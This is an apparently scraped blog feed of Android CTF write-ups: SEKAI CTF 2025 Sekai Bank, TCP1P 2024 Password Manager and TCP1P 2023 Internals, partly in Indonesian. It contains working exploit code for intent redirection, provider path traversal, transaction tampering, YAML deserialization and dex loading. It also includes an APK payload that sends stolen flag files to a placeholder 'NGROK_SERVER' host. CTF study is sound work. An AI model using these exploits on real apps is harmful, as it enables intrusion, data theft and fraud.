Azka Ainul Maarijlawbyte2026-05-06T07:20:33.564Zhttps://lbyte.id/lawbyteHexoSEKAI CTF 2025: Sekai Bank Transactionhttps://lbyte.id/2025/08/18/writeup/SEKAI%20CTF%202025:%20Sekai%20Bank%20Transaction/2025-08-18T00:00:00.000Z2026-05-06T07:20:33.564Z
Introduction
This document provides a detailed walkthrough of the vulnerability found in the SekaiBank Android application and how we exploited it to steal one million from the admin user.
Vulnerability Analysis
MainActivity Fallback Intent Vulnerability
The primary vulnerability in the SekaiBank application is in the MainActivity.onCreate() method. The application has a try-catch block that, upon exception, retrieves a ParcelableExtra named “fallback” from the Intent and calls startActivity() on it:
The MainActivity is exported (as shown in the AndroidManifest.xml)
It allows an attacker to execute arbitrary Intents within the victim app’s context
The exception can be easily triggered by providing malformed extras
Path Traversal in LogProvider
The second vulnerability is in the LogProvider class. While the provider itself is not exported (android:exported="false"), it does grant URI permissions (android:grantUriPermissions="true"). This means that if we can execute code within the victim’s context (which we can via the MainActivity fallback), we can access this provider.
The LogProvider.query() method is vulnerable to path traversal:
The key vulnerability is that when transactions are processed, they use the currently authenticated user’s token - which in the CTF scenario is the admin’s token:
// This is what the victim will start (our sink) with URI grants Intentfallback=newIntent(this, SinkActivity.class); fallback.setData(target); fallback.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION | Intent.FLAG_GRANT_WRITE_URI_PERMISSION | Intent.FLAG_GRANT_PREFIX_URI_PERMISSION); fallback.setClipData(ClipData.newRawUri("sekai", target));
// Kick victim MainActivity; force try{} path and crash in setupMainUI() Intentkick=newIntent(); kick.setClassName(VICTIM_PKG, VICTIM_ENTRY);
Once our SinkActivity is launched by the victim app, we have access to the LogProvider with the permissions we granted. We use path traversal to access the delayed_transactions directory:
1 2 3 4 5
Uriu= getIntent().getData(); // This is the URI from our fallback Intent // URI is something like: content://com.sekai.bank.logprovider/%2e%2e/files/delayed_transactions/
// List files in the directory Cursorcursor= getContentResolver().query(u, null, null, null, null);
Step 3: Extract Transaction Data
We extract the first transaction file from the directory and read its contents:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
// Get the first file cursor.moveToFirst(); if (nameIndex >= 0) { firstFilename = cursor.getString(nameIndex); }
// Read the file content UrifileUri= Uri.parse(u + "/" + firstFilename); InputStreamis= getContentResolver().openInputStream(fileUri); byte[] data = readAll(is); StringfileContent=newString(data);
// Extract id and pin from JSON JSONObjectjson=newJSONObject(fileContent); originalId = json.optString("id", "unknown-id"); originalPin = json.optString("pin", "000000");
Step 4: Inject Malicious Transaction
Finally, we create a malicious transaction with the extracted PIN (to pass authentication) and write it back to the file:
// Write the modified payload to the file OutputStreamos= getContentResolver().openOutputStream(fileUri); os.write(modifiedPayload.getBytes()); os.flush(); os.close();
The transaction will be processed automatically by the victim app, using the admin’s token, and the money will be sent to our account.
/** * Launcher: * - Forces victim MainActivity into try{} and throws (ClassCastException) * - Supplies fallback Intent to our SinkActivity * - Embeds a content:// URI for LogProvider with READ/WRITE/PREFIX grants */ publicclassKickActivityextendsActivity {
// This is what the victim will start (our sink) with URI grants Intentfallback=newIntent(this, SinkActivity.class); fallback.setData(target); fallback.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION | Intent.FLAG_GRANT_WRITE_URI_PERMISSION | Intent.FLAG_GRANT_PREFIX_URI_PERMISSION); fallback.setClipData(ClipData.newRawUri("sekai", target));
// Kick victim MainActivity; force try{} path and crash in setupMainUI() Intentkick=newIntent(); kick.setClassName(VICTIM_PKG, VICTIM_ENTRY);
/** * Started by the victim via fallback. Receives a granted content:// URI. * - If URI is a directory → lists via query() * - Extracts first file from the directory * - Reads the file content and extracts pin and id * - Writes a modified payload with the same pin and id */ publicclassSinkActivityextendsActivity { privatestaticfinalStringTAG="SEKAI-POC";
// 1) LIST (works if URI points to a directory for this provider) StringfirstFilename=null; Cursorcursor=null; try { cursor = getContentResolver().query(u, null, null, null, null); if (cursor != null && cursor.getCount() > 0) { intnameIndex= cursor.getColumnIndex("name"); intsizeIndex= cursor.getColumnIndex("size"); intpathIndex= cursor.getColumnIndex("path"); out.append("LISTING:\n"); // Get the first file cursor.moveToFirst(); if (nameIndex >= 0) { firstFilename = cursor.getString(nameIndex); Stringsize= (sizeIndex >= 0) ? cursor.getString(sizeIndex) : "unknown"; Stringpath= (pathIndex >= 0) ? cursor.getString(pathIndex) : "unknown"; Log.i(TAG, "First file: " + firstFilename + " (size: " + size + ", path: " + path + ")"); out.append("First file: " + firstFilename + " (size: " + size + ", path: " + path + ")\n\n"); } // List all files for debugging cursor.moveToPosition(-1); // Reset cursor position while (cursor.moveToNext()) { Stringname= (nameIndex >= 0) ? cursor.getString(nameIndex) : "<no-name>"; Stringsize= (sizeIndex >= 0) ? cursor.getString(sizeIndex) : "<no-size>"; Stringpath= (pathIndex >= 0) ? cursor.getString(pathIndex) : "<no-path>"; out.append(" - ").append(name).append(" (").append(size).append(") : ").append(path).append("\n"); } out.append("\n"); } else { out.append("LISTING: No files found or null cursor\n\n"); Log.e(TAG, "No files found or null cursor"); } } catch (Throwable t) { Log.e(TAG, "Query failed", t); out.append("LISTING failed: ").append(t).append("\n\n"); }
// Check if we found a file if (firstFilename == null) { Log.e(TAG, "No files found in the directory"); out.append("ERROR: No files found in the directory\n\n"); if (cursor != null) { cursor.close(); } tv.setText(out.toString()); return; }
// 2) READ the specific file StringoriginalId=null; StringoriginalPin=null; try { // Construct URI to the specific file UrifileUri= Uri.parse(u + "/" + firstFilename); Log.i(TAG, "Trying to read file: " + fileUri); out.append("Trying to read file: " + fileUri + "\n\n"); InputStreamis= getContentResolver().openInputStream(fileUri); if (is != null) { byte[] data = readAll(is); is.close(); StringfileContent=newString(data); Log.i(TAG, "READ OK: File content:\n" + fileContent); out.append("READ OK: Original file content:\n" + fileContent + "\n\n"); // Extract id and pin from JSON try { JSONObjectjson=newJSONObject(fileContent); originalId = json.optString("id", "unknown-id"); originalPin = json.optString("pin", "000000"); Log.i(TAG, "Extracted ID: " + originalId + ", PIN: " + originalPin); out.append("Extracted ID: " + originalId + ", PIN: " + originalPin + "\n\n"); } catch (JSONException je) { Log.e(TAG, "Failed to parse JSON", je); out.append("Failed to parse JSON: " + je.getMessage() + "\n\n"); originalId = "exploit-" + System.currentTimeMillis(); originalPin = "000000"; // Fallback } // 3) WRITE modified content to the same file try { // Create our payload with the extracted ID and PIN SimpleDateFormatsdf=newSimpleDateFormat("yyyy-MM-dd'T'HH:mm:ss.SSS'Z'"); Stringnow= sdf.format(newDate()); StringpastTime= sdf.format(newDate(System.currentTimeMillis() - 86400000)); // 1 day ago StringmodifiedPayload="{\n" + " \"id\": \"" + originalId + "\",\n" + " \"toUsername\": \"none\",\n" + " \"amount\": 1000000,\n" + " \"message\": \"flag please\",\n" + " \"pin\": \"" + originalPin + "\",\n" + " \"createdAt\": \"" + now + "\",\n" + " \"scheduledTime\": \"" + pastTime + "\",\n" + " \"type\": \"USER_SCHEDULED\"\n" + "}"; Log.i(TAG, "Created modified payload:\n" + modifiedPayload); out.append("Created modified payload:\n" + modifiedPayload + "\n\n"); // Write the modified payload to the file OutputStreamos= getContentResolver().openOutputStream(fileUri); if (os != null) { os.write(modifiedPayload.getBytes()); os.flush(); os.close(); Log.i(TAG, "WRITE OK: Successfully wrote modified payload to " + firstFilename); out.append("WRITE OK: Successfully wrote modified payload to " + firstFilename + "\n\n"); // Verify the write by reading again try { InputStreamverifyIs= getContentResolver().openInputStream(fileUri); if (verifyIs != null) { byte[] verifyData = readAll(verifyIs); verifyIs.close(); StringverifyContent=newString(verifyData); Log.i(TAG, "VERIFY OK: File content after write:\n" + verifyContent); out.append("VERIFY OK: File content after write:\n" + verifyContent + "\n\n"); } } catch (Exception ve) { Log.e(TAG, "Failed to verify write", ve); out.append("Failed to verify write: " + ve.getMessage() + "\n\n"); } } else { Log.e(TAG, "Failed to open output stream for " + fileUri); out.append("Failed to open output stream for " + fileUri + "\n\n"); } } catch (Exception we) { Log.e(TAG, "Failed to write modified payload", we); out.append("Failed to write modified payload: " + we.getMessage() + "\n\n"); } } else { Log.e(TAG, "Failed to open input stream for " + fileUri); out.append("Failed to open input stream for " + fileUri + "\n\n"); } } catch (Exception e) { Log.e(TAG, "Error in read/write process", e); out.append("Error in read/write process: " + e.getMessage() + "\n\n"); } finally { if (cursor != null) { cursor.close(); } }
This exploit chain demonstrates several common Android security vulnerabilities:
Intent-based IPC vulnerabilities: The MainActivity fallback vulnerability allows arbitrary Intent execution within the victim’s context.
Path traversal: The LogProvider is vulnerable to path traversal, allowing access to files outside its intended scope.
Insecure file operations: The delayed transaction system doesn’t properly validate the integrity of transaction files before processing them.
The combination of these vulnerabilities allows us to execute a complete exploit chain that:
Gains execution within the victim’s context
Accesses sensitive files
Modifies those files to steal money
Leverages the victim’s authentication to process the transaction
This exploit is particularly dangerous because it requires no user interaction beyond installing and running our malicious app, and it can steal money from any user who has the vulnerable SekaiBank app installed.
]]><iframe width="100%" height="400" src="https://www.youtube.com/embed/7xVm1CLk-Yo?si=OU-lhFM7VSq5ZCT1" title="YouTube video player" framebordTCP1P 2024: Mobile Writeuphttps://lbyte.id/2024/10/15/writeup/TCP1P%202024:%20Mobile%20Writeup/2024-10-15T04:28:06.000Z2026-05-06T07:20:33.564ZTeam: MAGER / Vantage Point Security Rank: 5/1110
Password Manager 2.0
Overview
Challenge ini adalah sebuah aplikasi Password Manager yang memiliki sebuah activity bernama CalculatorActivity. Activity ini melakukan operasi matematika sederhana dan memiliki intent yang exported="true", yang berarti dapat diakses oleh aplikasi lain tanpa memerlukan permission.
Pada activity ini terdapat sebuah exception yang terjadi ketika melakukan pembagian dengan angka 0. Exception ini dapat digunakan untuk bypass operasi matematika yang seharusnya dilakukan. Ketika exception terjadi, dia akan melakukan setResult(-1, i) yang dimana nilai i adalah Intent i = getIntent();, yang memungkinkan kita untuk melakukan intent injection.
Dengan memanfaatkan bug ini, kita dapat menulis ke content provider untuk membuat file pwds.yml dan mal.apk di folder /files/. File pwds.yml akan diload oleh snakeyaml, yang memiliki kemampuan untuk melakukan deserialization. Kita dapat memanfaatkan deserialization ini untuk menjalankan gadget dari ScriptEngineManager, yang dapat dikombinasikan dengan CustomClassLoader dalam mal.apk. Hal ini memungkinkan kita untuk melakukan remote code execution pada aplikasi ini dengan meload mal.apk yang telah kita buat.
Description
It’s a Password Manager, what could go wrong (again)?
The infrastructure being used is based on our Mobile POC Tester (https://github.com/TCP1P/Mobile-POC-Tester). You will need to create your exploit application that will be executed in the server. You can check client_dist.py for more information on how the automation for this challenge runs.
APK-nya adalah aplikasi Password Manager. Kita bisa mendekompilasi menggunakan jadx untuk melihat kode sumbernya. Aplikasi ini hanya memiliki password manager didalamnya yang dimana ketika kita melakukan Happy Flow pada aplikasinya, kita bisa memasukan kata sandi baru kedalam aplikasi ini dan nantinya kata sandi itu akan disimpan pada internal storage pada android kita.
Struktur dari aplikasi ini adalah sebagai berikut:
Ketika kita perhatikan pada activity com.aimardcr.pwdmanager.ui.pwd.PwdFragment kita bisa melihat bahwa dia menggunakan snakeyaml untuk load file pwds.yml:
Dia tidak menggunakan SafeConstructor yang dimana bisa membatasi class yang bisa di-deserialize. Jadi kita bisa melakukan deserialization gadget chaining untuk melakukan remote code execution. Tetapi kita tidak tahu bagaimana cara write file pwds.yml ini.
Content Provider
Kita bisa melihat bahwa aplikasi ini memiliki sebuah content provider yang bisa kita akses dengan content://com.aimardcr.pwdmanager:
Tapi kita tidak bisa mengakses content provider ini karena exported="false", yang artinya content provider ini hanya bisa diakses oleh aplikasi ini sendiri.
CalculatorActivity
Jika kita melihat AndroidManifest.xml, kita bisa melihat bahwa aplikasi ini memiliki activity yang bernama CalculatorActivity yang dimana memiliki exported="true":
exported="true" artinya bahwa activity tersebut bisa diakses oleh aplikasi lain tanpa memerlukan permission. Hal ini merupakan risiko keamanan karena aplikasi lain bisa menjalankan activity ini tanpa memerlukan permission.
Berikut ini adalah source code dari CalculatorActivity:
/* loaded from: classes3.dex */ publicclassCalculatorActivityextendsActivity { @Override// android.app.Activity publicvoidonCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_calculator); Intenti= getIntent(); try { intleft= i.getIntExtra("left", 4); intright= i.getIntExtra("right", 2); charoperator= i.getCharExtra("operator", '+'); intresult=0; switch (operator) { case'*': result = left * right; break; case'+': result = left + right; break; case'-': result = left - right; break; case'/': result = left / right; break; } setResult(0, newIntent().putExtra("result", result)); } catch (Exception e) { setResult(-1, i); } finish(); } }
Seperti yang bisa kita lihat pada kode diatas, CalculatorActivity menerima 3 parameter: left, right, dan operator. Kemudian melakukan perhitungan berdasarkan operator dan mereturn hasilnya. Hasilnya kemudian dikirim kembali ke caller activity.
Tapi ada sebuah exception yang dimana jika kita melakukan pembagian dengan angka 0, maka akan terjadi exception dan dia akan mereturn setResult(-1, i) yang dimana nilai i adalah Intent i = getIntent();, yang memungkinkan kita untuk melakukan intent injection.
CustomClassLoader
Kita bisa melihat bahwa aplikasi ini memiliki sebuah class yang bernama CustomClassLoader yang dimana bisa kita gunakan untuk melakukan load class dari apk yang kita buat:
Tapi ini hanya bisa melakukan load saja dan tidak bisa melakukan execute class yang kita load.
ScriptEngineManager
Kita bisa melihat bahwa aplikasi ini memiliki library javax.script yang dimana bisa kita gunakan untuk melakukan execute class yang kita load, karena didalam argument dari ScriptEngineManager dia menerima ClassLoader:
Dari kode diatas, kita bisa melihat bahwa ScriptEngineManager menerima ClassLoader sebagai argument dan dia akan melakukan invoke dari class yang kita load dari ClassLoader tersebut.
Pada bagian initEngines ini, CustomClassLoader akan digunakan untuk mencari dan memuat semua class yang mengimplementasikan ScriptEngineFactory. Jika salah satu class dalam mal.apk mengimplementasikan interface tersebut, maka constructor dari class tersebut akan dipanggil saat baris berikut dieksekusi:
Yang berarti kita perlu membuat constructor yang akan menerapkan interface ScriptEngineFactory dan mengimplementasikan semua metode yang diperlukan, dan kemudian memanggil CustomClassLoader didalam ScriptEngineManager untuk meng-eksekusi constructor tersebut.
Kode diatas akan memuat semua class yang mengimplementasikan ScriptEngineFactory dari mal.apk dan memanggil constructor dari class tersebut.
Exploitation
Dari CalculatorActivity Ini bisa kita manfaatkan untuk mengakses content provider yang sebelumnya tidak bisa kita akses. Kita bisa membypass content provider yang memiliki exported="false" dengan menggunakan FLAG_GRANT_WRITE_URI_PERMISSION untuk write file dan atau FLAG_GRANT_READ_URI_PERMISSION untuk read file pada intent yang kita kirimkan.
Dapat diperhatikan bahwa kita menggunakan FLAG_GRANT_WRITE_URI_PERMISSION untuk menulis file pwds.yml dan FLAG_GRANT_READ_URI_PERMISSION untuk membaca file pwds.yml. Dan kita bisa melihat bahwa kita menulis payload yaml yang dimana akan di-load oleh SnakeYAML:
Payload ini akan melakukan load class dari mal.apk yang mengimplementasikan ScriptEngineFactory dan kemudian memanggil constructor dari class tersebut.
Kemudian kita bisa membuat mal.apk yang mengimplementasikan ScriptEngineFactory:
// Static block to trigger the exploit and send the flag static { try { sendRequest("http://NGROK_SERVER/trigger"); System.out.println("Triggered the exploit");
// Function to read the flag file privatestatic String readFlagFile(String directoryPath) { try { Pathdir= Paths.get(directoryPath); try (DirectoryStream<Path> stream = Files.newDirectoryStream(dir, "flag*.txt")) { for (Path entry : stream) { returnnewString(Files.readAllBytes(entry)); // Return the first match } } } catch (IOException e) { System.err.println("Failed to read flag file: " + e.getMessage()); } returnnull; }
// Function to send the flag content to the server privatestaticvoidsendFlagToServer(String serverUrl, String flagContent)throws Exception { URLurl=newURL(serverUrl); HttpURLConnectionconnection= (HttpURLConnection) url.openConnection(); connection.setRequestMethod("POST"); connection.setDoOutput(true); connection.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
@Override public String getProgram(String... statements) { StringBuilderprogram=newStringBuilder(); for (String statement : statements) { program.append(statement).append(";\n"); } return program.toString(); }
@Override public ScriptEngine getScriptEngine() { returnnull; } }
Dapat diperhatikan pada kode diatas bahwa kita melakukan HTTP GET request ke http://NGROK_SERVER/trigger dan membaca file flag yang berawalan flag dan mengirimkan isinya ke http://NGROK_SERVER/flag.
Tetapi hal yang paling penting adalah dikode diatas melakukan implementasi dari ScriptEngineFactory yang dimana akan dipanggil oleh ScriptEngineManager untuk melakukan remote code execution.
Kemudian kita bisa merubah hasil build dari mal.apk dengan menggunakan apktool lalu rubah isi dari META-INF/services/javax.script.ScriptEngineFactory menjadi com.lbyte.mal.BadScriptEngineFactory dan kemudian kita rebuild apk tersebut, agar ketika dijalankan ScriptEngineManager akan memanggil class BadScriptEngineFactory yang kita buat.
Selanjutnya adalah untuk melakukan write mal.apk ini ke dalam folder /files/, kita bisa mengconvert file mal.apk ini ke dalam hex dan kemudian menconvert kembali hexnya ke dalam binary dan kemudian menulisnya ke dalam file mal.apk, berikut ini python scriptnya:
// Optionally write to the original URI as well ContentResolvercontentResolver=this.getContentResolver(); OutputStreamoutputStream= contentResolver.openOutputStream(uri); if (outputStream != null) { outputStream.write(apkBytes); outputStream.close(); Log.d(": LOG - Malicious :", "Binary APK written to the provided URI"); } } catch (Exception e) { e.printStackTrace(); } }
Berikut ini repository untuk full solver dari challenge ini:
Repo untuk melakukan write file pwds.yml dan mal.apk: write-files.
Repo untuk membuat mal.apk yang mengimplementasikan ScriptEngineFactory: malicious-apk.
Dan berikut ini adalah build dari kedua repo diatas:
]]><p>Team: MAGER / Vantage Point Security<br>Rank: 5/1110</p>
<p><img
lazyload
src="/imaTCP1P 2023: Mobile Writeuphttps://lbyte.id/2023/10/15/writeup/TCP1P%202023:%20Mobile%20Writeup/2023-10-15T17:39:41.000Z2026-05-06T07:20:33.564ZCheck my writeup on this challenge below: https://jekyll-theme-chirpy-git-master-noxlaw.vercel.app/posts/all-mobile-tcp1p-ctf/]]><p>Check my writeup on this challenge below:<br><a class="link" href="https://jekyll-theme-chirpy-git-master-noxlaw.vercel.app/posts/all-mintechfest 2023: Notes Manager Challenge - CXMAPhttps://lbyte.id/2023/10/15/writeup/intechfest%202023:%20Notes%20Manager%20Challenge%20-%20CXMAP/2023-10-15T17:27:46.000Z2026-05-06T07:20:33.564ZCheck my walkthrough video on this challenge below: https://www.facebook.com/lawbytee/videos/1328446641202923
]]><p>Check my walkthrough video on this challenge below:<br><a class="link" href="https://www.facebook.com/lawbytee/videos/1328446641202923"TCP1P 2023: Internalshttps://lbyte.id/2023/09/15/writeup/TCP1P%202023:%20Internals/2023-09-15T00:00:00.000Z2026-05-06T07:20:33.564Z
Seperti yang sudah ada dideskripsi challenge nya, untuk menyelesaikan challenge ini kita perlu untuk membuat malicious/exploit aplikasi sendiri yang dimana nanti akan diinstall di Virtual Android Device dari TCP1P.
Sebelum kita membuat malicious code atau exploitnya, penting bagi kita untuk memahami aplikasi internals ini secara mendalam. Langkah pertama yang krusial adalah menganalisis aplikasi tersebut dengan menggunakan tools decompiler. Decompiler ini memungkinkan kita untuk membuka aplikasi “challenge” menjadi source code yang dapat kita baca dan pahami. Saya pribadi menggunakan tools decompiler dari jadx untuk melakukan ini.
Cara menggunakan jadx:
Buka exe dari jadx yang sudah didownload, dan akan menampilkan seperti gambar berikut ini.
Kita klik tombol Open file dan kemudian cari .apk challenge yang sudah didownload oleh teman teman.
Setelah itu jadx akan menalisis nya dan mendecompile apk tersebut agar dapat kita baca, beriku ini hasil decompile dari jadx.
Cari nama package dari aplikasi challenge terlebih dahulu, untuk mengetahui nama package dari aplikasi ini adalah dengan melihat code dari file AndroidManifest.xml terlebih dahulu, yang didapatkan dari isi dari Resources -> AndroidManifest.xml.
Buka file AndroidManifest.xml nya dan cari kata MainActivity, karena biasanya developer android menggunakan MainActivity sebagai class utama dari aplikasi mereka.
Dalam contoh kasus ini nama package dari aplikasi ini adalah com.kuro.internals.
Setelah mendapatkan nama package dari aplikasi nya, kita bisa melihat source code dari aplikasinya lewat jadx yang ada pada Source code -> [nama package dari aplikasi] contohnya Source Code -> com.kuro.internals.
Diberikan challenge dengan nama Internals dengan deskripsi sebagai berikut:
Let’s see how well your knowledge about android internals. Using any type of external library will deduct your points by half.
Hint :
You do know android is open source right? Then it’s time to read the source code! Especially on getPackageName.
Do some OSINT on the author’s repositories, maybe you’ll find an interesting project.
Dari deskripsi yang diberikan terlihat kita dichallenge oleh pembuat soal terkait knowledge kita tentang andoir internals, dan pembuat soal juga melarang kita untuk menggunakan library external untuk melakukan exploit nya, kalaupun kita menggunakan library external kita akan mendapatkan pengurangan point.
Sekarang coba kita install dan buka terlebih dahulu aplikasi challenge ini dan melihat bagaimana tampilan nya.
Terlihat aplikasi ini meminta url yang akan mendownload payload.dex dan akan meload dex nya.
Static analys
Oke setelah membaca deskripsi dan isi aplikasi dari soal kita perlu untuk melihat terlebih dahulu source code dari aplikasi internals ini, dan didpatkan satu activity yaitu MainActivity saja: Dengan isi dari activitynya sebagai berikut:
Bisa dilihat bahwa aplikasi menggunakan layout activity_main yang bisa didapatkan di jadx didalam folder Resources/res/layout/activity_main.xml, aplikasi ini juga mempunyai 1 button dan 1 EditText. Jadi simplenya ketika user sudah memasukan url kedalam box dan menekan button nya maka aplikasi akan mengambil url tersebut dan melemparkannya ke fungsi downloadDex, jika user tidak memasukan url kedalam box maka akan memunculkan popup URL cannot be empty!.
downloadDex
Pada fungsi downloadDex bisa dilihat bahwa aplikasi akan memunculkan dialog Downloading... dan akan melemparkannya ke fungsi AnonymousClass2.
Setelah membaca source code dari fungsi AnonymousClass2 bisa dilihat bahwa dia mencoba untuk mendownload file dex dari url yang kita berikan dan menyimpannya dengan nama file payload.dex yang kemudian akan dialihkan ke fungsi loadDex().
Create a malicious app
Dan disinilah bagian menariknya muncul dan bagaimana kita akan membuat malicious dex nya. Yang dimana dalam fungsi ini dia mengecheck terlebih dahulu apakah ada file payload.dex didalam folder files aplikasi kita, perlu dinote setiap file yang diload oleh android studio itu ada pada folder /data/data/[nama package apk]/files, jadi dalam kode ini aplikasi challenge akan mengecheck terlebih dahulu apakah file payload.dex itu ada atau tidak didalam folder files kita.
Selanjutnya ketika file payload.dex itu ada didalam folder files, payload.dex akan diload dengan DexClassLoader yang nantinya akan dicheck dengan menggunakan Reflection untuk meload class didalam file dex nya, yang dimana dikode ini aplikasi challenge berusaha untuk meload class dari package com.kuro.payload dengan nama class Main dan juga dia mengambil method dari execute untuk dijalankan diaplikasi challenge, setelah berhasil loadClass dari payload.dex dia akan mengecheck nama package dari aplikasi challenge yang dimana saat ini masihlah com.kuro.internals sudah berubah ke nama package baru atau tidak yaitu l33t_h4x0r, ketika kondisi ini terpenuhi aplikasi akan menampilkan flag nya.
Setelah berhasil memahami bagaimana alur dari aplikasi ini berjalan, penulis sudah mempunya gambaran tentang bagaimana membuat malicious dex nya agar ketika dex yang penulis buat nanti bisa merubah packageName dari aplikasi challenge dari com.kuro.internals ke l33t_h4x0r.
Dari hint yang diberikan oleh pembuat soal, pembuat soal meminta kita untuk melakukan osint digithub akunnya dia.
Akhirnya penulis menemukan akun githubnya dan menemukan repository yang menarik didalamnya yaitu APKKiller, didalam repository ini pembuat soal memberitahukan bahwa dengan menggunakan Reflection kita bisa membaca dan memodifikasi internal classes dan fields nya.
Setelah membaca dan melakukan trial and error tentang Reflection penulis menemukan cara bahwa kita bisa menggunakan class dari ActivityThread untuk mengubah packageName ke packageName yang kita mau.
Cobalah untuk membuat projek baru di Android Studio dengan setup sebagai berikut:
Pilih Empty Views Activity lalu Next.
Buatlah nama terserah kalian, asalkan nama package nya itu com.kuro.payload karena pada aplikasi challenge package ini yang akan di load, lalu pilihlah Java sebagai bahasa pemrogramannya, karena Reflection bisa kita pakai di java.
Setelah itu klik Finish dan tunggu sampai android studio menyiapkan setupnya.
Setelah semuanya sudah selesai, kita buat class baru dengan nama Main karena aplikasi challenge akan meload class dari package kita dengan nama Main dengan klik kanan pada package com.kuro.payload lalu klik New -> Java Class.
Masukan nama Main dan enter.
Kita akan memakai activity MainActivity terlebih dahulu untuk debugging.
Jadi step pertama adalah cari terlebih dahulu field dari packageName dan kemudian baru kita set ke value yang baru
Coba gunakan kodingan diatas dan jalankan, lalu coba untuk melihat logcat nya karena saya memasukan Log.e disitu untuk debugging dan melihat isi field dari ActivityThread.
Dan didapatlah isi field dari class ActivityThread.
Seperti yang diberikan hint oleh pembuat soal bahwa getPackageName itu terdapat pada mPackageInfo.
Setelah menghabiskan banyak waktu disini, akhirnya saya menemukan bahwa didalam fields mBoundApplication terdapat field info
@Override protectedvoidonCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); try { // Get the current ActivityThread instance Class<?> activityThreadClass = Class.forName("android.app.ActivityThread"); MethodcurrentActivityThread= activityThreadClass.getDeclaredMethod("currentActivityThread"); currentActivityThread.setAccessible(true); ObjectactivityThread= currentActivityThread.invoke(null);
// Get the loaded package info FieldmBoundApplicationField= activityThreadClass.getDeclaredField("mBoundApplication"); mBoundApplicationField.setAccessible(true); ObjectmBoundApplication= mBoundApplicationField.get(activityThread);
// Set the new package name FieldpackageNameField= loadedApkInfo.getClass().getDeclaredField("mPackageName"); packageNameField.setAccessible(true); packageNameField.set(loadedApkInfo, "l33t_h4x0r");
try { // Get the current ActivityThread instance Class<?> activityThreadClass = Class.forName("android.app.ActivityThread"); MethodcurrentActivityThread= activityThreadClass.getDeclaredMethod("currentActivityThread"); currentActivityThread.setAccessible(true); ObjectactivityThread= currentActivityThread.invoke(null);
// Get the loaded package info FieldmBoundApplicationField= activityThreadClass.getDeclaredField("mBoundApplication"); mBoundApplicationField.setAccessible(true); ObjectmBoundApplication= mBoundApplicationField.get(activityThread);
// Set the new package name FieldpackageNameField= loadedApkInfo.getClass().getDeclaredField("mPackageName"); packageNameField.setAccessible(true); packageNameField.set(loadedApkInfo, "l33t_h4x0r"); } catch (Exception e) { e.printStackTrace(); }
} }
Setelah itu set gradle nya agar ketika dibuild classes.dex nya itu hanya satu dan tidak multiple dengan menambahkan config sebagai berikut:
Setelah itu kita build projek ini.
Akan muncul popup di pojok kanan bawah seperti berikut ini.
Klik locate dan akan diarahkan ke folder apk yang sudah dibuild:
Masuk kedalam folder debug.
Dan app-debug.apk ini adalah hasil compile kita tadi, setelahnya kita buka apk ini di jadx untuk kita ambil classes.dex nya dan kita pakai di aplikasi challenge.
folder apk hasil compile ada di <Nama Folder Projek>\app\build\outputs\apk\debug.
Setelah dibuka dengan jadx, kita save all hasil decompile ini dan masukan kedalam sebuah folder, saya sendiri memasukannya ke folder kelasss.
Setelah itu kita copy classes.dex nya yang terdapat di folder kelasss/resources/classes.dex ke folder yang lain untuk bisa kita transfer ke aplikasi challenge.
Saya memasukannya di folder internals saja dan saya rubah namanya ke payload.dex dan menjalankan http.server dan ngrok, setelah itu tinggal masukan url nya ke box dan exploit kita berhasil untuk mendapatkan flagnya.
Tinggal dijalankan di Virtual Android Device dan didapatkan flagnya:
